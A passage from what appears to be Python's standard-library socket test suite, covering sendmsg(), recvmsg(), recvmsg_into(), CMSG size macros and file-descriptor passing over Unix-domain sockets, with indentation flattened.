# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
